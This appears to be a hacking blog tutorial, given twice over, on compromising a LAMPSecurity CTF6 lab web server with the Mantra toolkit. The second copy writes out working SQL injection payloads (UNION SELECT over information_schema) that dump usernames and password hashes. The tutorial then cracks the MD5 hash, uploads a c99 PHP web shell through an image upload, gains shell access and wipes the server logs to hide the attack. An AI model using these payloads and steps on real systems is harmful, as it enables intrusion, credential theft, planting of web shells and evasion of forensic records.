Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
Step 2:
I went through all the pages of web site and found a page with URL input
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
Step 7:
I went up to 7 and no change till now
Step 8:
I'm on 8 now and I can see the page changed
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
5.0.45 is the version
Step 14:
Let me list all the tables
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
Step 16:
I want columns from the table "user" and nothing else
Step 17:
Lets find the user name
Step 18:
Now, what about password
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7
Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7
Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
5.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
Step 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Step 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
Tags
bypassing